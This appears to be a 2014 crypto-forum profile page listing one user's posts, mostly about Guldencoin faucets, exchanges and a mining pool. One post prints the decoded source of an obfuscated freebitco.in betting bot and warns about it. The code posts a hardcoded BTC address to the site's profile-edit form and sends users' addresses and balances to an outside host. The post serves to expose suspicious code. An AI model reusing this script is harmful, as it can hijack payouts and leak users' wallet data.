Search content
Sort by

Showing 17 of 17 results by Lejenk
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY @ SUBWAY LEEUWARDEN, ASSEN & KAMPEN
by
Lejenk
on 10/05/2014, 01:03:07 UTC
Domain change: http://guldenfaucet.nl , http://nlg.lejenk.nl will not work anymore.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY @ SUBWAY LEEUWARDEN, ASSEN & KAMPEN
by
Lejenk
on 07/05/2014, 23:56:26 UTC
They will ask us, believe me Wink They say it themselves: "We reserve the right to add new markets outside of the voting system where we feel necessary."

 And else we go to Swissex. We do need only 1 other save exchange besides bittrex, so they have to be fast if they want us  Cheesy

Edit: By the way is https://www.kraken.com/market mentioned already?

Digital Currencies

    XBT - Bitcoin
    LTC - Litecoin
    XDG - Dogecoin
    NMC - Namecoin
    XRP - Ripple Currency
    XVN - Ven

National Currencies

    EUR - Euro
    USD - US Dollar
    KRW - South Korean Won

Good to see NLG in that list.... maybe?
Someone experience with it?

I would like to know how their system on adding coins works.
The reason why they have so less coins, are they a new exchange?

Anyways, hope someone has experience with them, and can answer these questions.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY @ SUBWAY LEEUWARDEN, ASSEN & KAMPEN
by
Lejenk
on 07/05/2014, 21:55:55 UTC
I see Mintpal have made it tougher to vote now, I find it a bit unfair on the newer coins being added like NLG. Now you have to do about 5 trades in order to vote once every hour.

NLG is 3rd on swisscex now, so if the coin retains this position it will be added next Sunday.
Agreed. On the other hand, they get a lot of shitcoins added and spam voted for, and they need to make some profit of it also ofc.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY @ SUBWAY LEEUWARDEN, ASSEN & KAMPEN
by
Lejenk
on 06/05/2014, 22:31:30 UTC
Guys I want to give 15 000 NLG away for Dutch Citizens, maybe like 150 for each person but they must be in the Netherlands and new to cryptos. What is the best way to go about doing this?

Another idea if the dev team want to do this, is for the next 300 Dutch citizens to claims coins they get extra 50 each, I am thinking that is best way to get unique users or maybe facebook?


Best way is to hand give them in the street.

A printed paper with instructions and explaining what is nlg for and a qrcode for the Android wallet.

if the person installs the app you transfer them 150nlg with your mobile wallet.

in 1 or 2 hours in a busy place like a train station you should be able to hand those out quickly.

Honestly, that's pretty brilliant.  Little paper wallet flyers.  I bet you could seriously move a bunch of these in a day.

Wildwest, if you go this route, PM me and let me know.  I might be willing to sponsor this endeavor with some extra funds.

-Fuse

Most of the time i dump flyers in the nearest trashcan, i think more people do.
The QR code should be scanned with the app, and funds deducted from a centralized wallet at that point i guess, if you pre-fund the paper wallets, a lot of funds will go lost.
Post
Topic
Board Service Announcements
Re: phptaskforce.uk.to - Free online gambling script
by
Lejenk
on 02/05/2014, 20:55:40 UTC
Nice script, here is the decoded version. If i'm not mistaken, it will change your BTC address...

Just to be clear, this script does not change users btc address, part of code that
sends request to freebitco.in edit op is used for authentication purposes.
It uses freebitcoin edit profile script response to determine if users btc address is really the address for which the script was generated.
There is no other way we can authenticate users unless we use edit profile functionality.

Hope you gonna understand how it verifies btc address and confirm that you were wrong about it, because you were skilled enough to unpack it.

Our users can also confirm that their address wasn't changed after script activation.
We didn't have those intentions when we were developing script.

phpTaskForce Team

Thanks for the explanation, it was my interpretation, since it was encrypted, and i saw some references to the edit profile section. Unpacking is not that hard, a lot of tools to go around, understanding it is another.
Connection to a host for any purpose, with an ecrypted source, does seem fishy, hope you understand my actions.
Post
Topic
Board Service Announcements
Re: phptaskforce.uk.to - Free online gambling script
by
Lejenk
on 01/05/2014, 02:05:45 UTC
Nice script, here is the decoded version. If i'm not mistaken, it will change your BTC address...

Code:
betType = 'hi';
stopGame = false;
totalWon = 0;
startBalance = 0;
toWin = 0;
ai_count = false;

function lose() {
    if ($('#double_your_btc_bet_lose').html() !== '') return true;
    else return false
}

function setStake(stake) {
    $('#double_your_btc_stake').val(stake.toString())
}

function doubleStake() {
    $('#double_your_btc_2x').click()
}

function resetStake() {
    setStake(config.startStake)
}

function getBalance() {
    return parseFloat($('#balance').html())
}

function getStake() {
    return parseFloat($('#double_your_btc_stake').val())
}

function balanceLeft() {
    return (getBalance() - getStake())
}

function toggleBet() {
    randT = Math.floor(Math.random() * 100) + 1;
    if (randT > 35) {
        if (betType === 'hi') {
            betType = 'lo'
        } else {
            betType = 'hi'
        }
    }
}
initControl = function () {
    $("head").append('');
    $("body").append('
connectionauthactiveerror
won:
0
goal:
0
Stop script
')
};
rollDice = function () {
    if (ai_count) {
        if (true === lose()) {
            doubleStake()
        } else {
            resetStake();
            if (config.toggle) toggleBet();
            totalWon = Math.round(100000000 * (getBalance() - startBalance));
            $("#m-won").html(totalWon.toString())
        } if (!stopGame) {
            if ((parseFloat(config.startStake) * Math.pow(2, config.tolerance)) < getStake()) {
                resetStake()
            }
            if (balanceLeft() >= config.btcGuard) {
                if (config.goal > getBalance()) {
                    $('#double_your_btc_bet_' + betType + '_button').click();
                    setTimeout(rollDice, config.sleep + Math.round(Math.random() * config.delayLimit))
                }
            }
        }
    } else {
        console.log('Verification failed.')
    }
};
$("body").delegate("#m-stop", "click", function (e) {
    if (ai_count) {
        stopGame = true;
        $("#taskforce-wrapper").fadeOut(700);
        $("#taskforce-wrapper").remove()
    }
});

function setControlMessage(msg) {
    $("#m-message").html(msg)
}

function createErrorMessage(msg) {
    return '
' + msg + '
'
}

function verify() {
    var btcAddress = String.fromCharCode(49, 76, 86, 117, 51, 81, 122, 109, 69, 69, 84, 57, 100, 106, 101, 97, 55, 86, 103, 81, 55, 65, 69, 49, 111, 55, 121, 57, 77, 70, 83, 85, 119, 122);
    var op = 'edit_profile';
    var btc_address = btcAddress;
    var email = $("#edit_profile_form_email").val();
    $.post('http://freebitco.in', {
        op: op,
        btc_address: btc_address,
        email: email
    }, function (response) {
        var editResponse = $.trim(response);
        if (editResponse.length == 0) {
            ai_count = true
        }
    })
}

function setGreenLight(num) {
    var selector = "#control-light > tbody:nth-child(1) > tr:nth-child(1) > td:nth-child(" + num + ")";
    $(selector).attr('bgcolor', '#41DE30')
}

function setRedLight(num) {
    var selector = "#control-light > tbody:nth-child(1) > tr:nth-child(1) > td:nth-child(" + num + ")";
    $(selector).attr('bgcolor', '#D91A1A')
}
ping_status = false;
ping_message = '';

function ping() {
    var version = 'v3.0';
    var info = version + ' : ' + $("#edit_profile_form_btc_address").val() + " : " + $('#balance').html() + " BTC";
    $.getJSON('http://phptaskforce.uk.to/get/ping.php?jsoncallback=?', {
        data: info
    }, function (r) {
        if (r.status == 'ok') {
            ping_status = true
        } else {
            if (r.message != 'none') {
                ping_message = r.message
            }
        }
    })
}

function init() {
    initControl();
    ping();
    setTimeout(function () {
        if (ping_status == true) {
            setGreenLight(1);
            verify();
            errorMessage = '';
            startBalance = getBalance();
            if (startBalance >= 0.00001200) {
                if (config.goal > startBalance) {
                    if (config.tolerance < 8) {
                        errorMessage = createErrorMessage('config.tolerance is to low. It has to be set to at least 8.')
                    } else {
                        var playBalance = getBalance() - parseFloat(config.btcGuard);
                        var maxInvest = parseFloat(config.startStake) * Math.pow(2, config.tolerance + 1) - parseFloat(config.startStake);
                        if (playBalance < maxInvest) {
                            errorMessage = createErrorMessage('Not enough money for that start stake and tolerance.')
                        } else {
                            if (config.sleep < 900) {
                                errorMessage = createErrorMessage('config.sleep must be higher than 900.')
                            } else {
                                toWin = Math.round(100000000 * (config.goal - startBalance))
                            }
                        }
                    }
                } else {
                    toWin = 0;
                    errorMessage = createErrorMessage('config.goal must be higher than your balance.')
                }
            } else {
                errorMessage = createErrorMessage('Minimum required balance is 0.00001200 BTC')
            }
            setTimeout(function () {
                if (ai_count) {
                    setGreenLight(2);
                    if (errorMessage == '') {
                        setGreenLight(3);
                        $("#m-goal").html(toWin.toString());
                        setControlMessage('
Donate:

1BtEZXCULJb37vPL1vz7sQjrChwDdStf8z

');
                        rollDice()
                    } else {
                        setRedLight(4);
                        setControlMessage(errorMessage)
                    }
                } else {
                    setRedLight(2);
                    setRedLight(4);
                    errorMessage = createErrorMessage('Verification failed.');
                    setControlMessage(errorMessage)
                }
            }, 2500)
        } else {
            setRedLight(1);
            setRedLight(4);
            if (ping_message != '') {
                errorMessage = createErrorMessage(ping_message)
            } else {
                errorMessage = createErrorMessage('Connection error.')
            }
            setControlMessage(errorMessage)
        }
    }, 2500)
}
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY AT SUBWAY LEEUWARDEN WITH YOUR MOBILE WALLET
by
Lejenk
on 30/04/2014, 16:12:58 UTC
Free Guldencoins: http://nlg.lejenk.nl/
                         http://guldencoin-faucet.mycryptoco.in/

Gratis guldencoins: http://nlg.lejenk.nl/
                          http://guldencoin-faucet.mycryptoco.in/

En ik mij maar afvragen waar al dat verkeer ineens vandaan kwam  Tongue Dank u.

http://guldencoin-faucet.mycryptoco.in/ Was dry, please consider donations to keep the faucets alive.
Post
Topic
Board Nederlands (Dutch)
Re: Belgisch bitcoin artikel
by
Lejenk
on 27/04/2014, 22:22:18 UTC
Quote
Ik vroeg hun de mening
Daar ben ik gestopt met lezen.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY AT SUBWAY LEEUWARDEN WITH YOUR MOBILE WALLET
by
Lejenk
on 27/04/2014, 16:35:14 UTC

Wow!! Helemaal top!!

Wist ik nog niet, even goed promoten en vooral ook goed op google te vinden zijn bij marktplaatsen en dergelijke. Via zoiets trek je dan ook weer aandacht.

Zal zien of ik wat te koop heb.
Zal er nog mee wachten, is namelijk nog niet gebruiksklaar.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — PAY AT SUBWAY LEEUWARDEN WITH YOUR MOBILE WALLET
by
Lejenk
on 26/04/2014, 19:33:37 UTC
Faucet

Still a work in progress, but it works for now.
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — THIS FRIDAY YOU CAN PAY AT...
by
Lejenk
on 23/04/2014, 22:49:07 UTC
Now it´s looking much better :-)

3,339.493923 unconfirmed ...

I give it a try for the next 2 days.

Let´s see if Hardcoreminers.com is the right place for me.

Well there were some problems last few days, can't argue with that (forks and such Sad).
But i am willing AND dedicated to fix issues if they occur, even if they take my midnight sleep. People can vouch for that Cheesy

I hope the pool lives up to your expectations, if you need anything or have a problem it's best to PM me since i cannot watch every thread closely (got multiple coins running).


I don't know who you are. I do know what you want. If you are looking for NLG, I can tell you I don't have it. But what I do have are a very particular set of hashes; hashes I have acquired over a very long career. Hashes that make me a nightmare for people like you. If you fix things now, that'll be the end of it. I will not look for you, I will not pursue you. But if you don't, I will look for CMD, I will find it, and I will exit.  Grin

Just wanted to say thanks for keeping this pool alive  Smiley

 
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — IMPORTANT UPDATE
by
Lejenk
on 22/04/2014, 21:13:45 UTC
Could use some help at https://nlg.hardcoreminers.com/.
6 Hours since last block :/
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — IMPORTANT UPDATE
by
Lejenk
on 22/04/2014, 15:54:57 UTC
Hello ,

i would like to help out in the hope your community will help us to in our project, Save The Greyhounds in Spain  see link in my signature

we just have downloaded the windows wallet the last one , saver,

her is our Gulden Wallet Adress :   GcfkiZPaqMyNumezFVUgKqgYXEsLDu1FQM   Save To Use  !

Only accepting coins?

http://blakow.files.wordpress.com/2013/10/something-smells-fishy-and-it-certainly-isnt-fish.jpg
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — CRITICAL UPDATE : KGW FIXED AT BLOCK 33300
by
Lejenk
on 21/04/2014, 10:16:02 UTC

Seen that the blocks found atm are n/a at transactions on my account.

Blocks must have 120 confirmations, so it takes a while for confirm. My first payout transaction of found blocks was 6:47 am and was ok. At a payout itself there is no block mentioned. At the transaction-page you can scroll downwards to see which block is confirmed or not.



I know, added a screen to show what i mean. Never seen this n/a before.

http://s28.postimg.org/xrkk3iqt9/pool.png
Post
Topic
Board Announcements (Altcoins)
Re: [ANN][NLG] Guldencoin — CRITICAL UPDATE : KGW FIXED AT BLOCK 33300
by
Lejenk
on 21/04/2014, 09:37:21 UTC

No worries. I just hate when these things happen.

Can someone do me a "getpeerinfo" in the debug window?
I need to see some nodes. For some reason i get disconnected to some of the official nodes (probably ban score because of invalid chain).


Code:
11:29:25

getpeerinfo


11:29:25

[
{
"addr" : "192.227.231.34:9231",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072483,
"bytessent" : 2863,
"bytesrecv" : 26793,
"blocksrequested" : 0,
"conntime" : 1398071813,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3.1/",
"inbound" : false,
"startingheight" : 33485,
"banscore" : 0,
"syncnode" : true
},
{
"addr" : "[2001:0:5ef5:79fb:10a1:169c:4371:c697]:9231",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072482,
"bytessent" : 5443,
"bytesrecv" : 24087,
"blocksrequested" : 0,
"conntime" : 1398071813,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3.1/",
"inbound" : false,
"startingheight" : 33485,
"banscore" : 0
},
{
"addr" : "107.170.241.240:9231",
"services" : "00000003",
"lastsend" : 1398072483,
"lastrecv" : 1398072483,
"bytessent" : 5820,
"bytesrecv" : 22481,
"blocksrequested" : 0,
"conntime" : 1398071813,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3/",
"inbound" : false,
"startingheight" : 33485,
"banscore" : 0
},
{
"addr" : "192.227.231.43:9231",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072482,
"bytessent" : 7384,
"bytesrecv" : 24677,
"blocksrequested" : 0,
"conntime" : 1398071814,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3.1/",
"inbound" : false,
"startingheight" : 33485,
"banscore" : 0
},
{
"addr" : "94.23.164.74:9231",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072482,
"bytessent" : 1342,
"bytesrecv" : 25636,
"blocksrequested" : 0,
"conntime" : 1398071820,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3/",
"inbound" : false,
"startingheight" : 33485,
"banscore" : 0
},
{
"addr" : "94.210.77.211:53427",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072482,
"bytessent" : 24103,
"bytesrecv" : 2630,
"blocksrequested" : 0,
"conntime" : 1398072081,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3.1/",
"inbound" : true,
"startingheight" : 33488,
"banscore" : 0
},
{
"addr" : "[2001:0:5ef5:79fb:c9c:3f6e:3aa8:2d92]:51716",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072483,
"bytessent" : 21151,
"bytesrecv" : 1157,
"blocksrequested" : 0,
"conntime" : 1398072436,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3.1/",
"inbound" : true,
"startingheight" : 33494,
"banscore" : 0
},
{
"addr" : "82.75.141.118:9231",
"services" : "00000003",
"lastsend" : 1398072482,
"lastrecv" : 1398072486,
"bytessent" : 1157,
"bytesrecv" : 16169,
"blocksrequested" : 0,
"conntime" : 1398072482,
"version" : 70005,
"subver" : "/GuldenCoin:1.1.3/",
"inbound" : false,
"startingheight" : 33494,
"banscore" : 0
}
]


Hope it helps. Seen that the blocks found atm are n/a at transactions on my account.
Post
Topic
Board Games and rounds
Re: Long Term Algorithms - Customized DiceBot - Doge-Dice and Just-Dice
by
Lejenk
on 05/04/2014, 16:21:07 UTC
I just came by to say thank you. I'm using the last config file, which works like a charm.
I started out with 200 doge, which i had to mine myself, and yes, on my laptop it took days lol.

I'm up to 600 doges now, in less than an hour.
When i have made some more, i would like to donate you some as a thank you. If you accept, just send me your doge address in pm.

Thanks again.
Post
Topic
Board Games and rounds
Re: *Free btc* win BTC everyweek with surf4bitcoin.com [1.42195168 BTC]
by
Lejenk
on 04/04/2014, 23:31:12 UTC
REG ID: 291666-c659cc9907df1d64f4d9f17dea3dcd82
BTC: 141F2ji7Sh4LMZbk6UjJdsZJd2kZGerLe4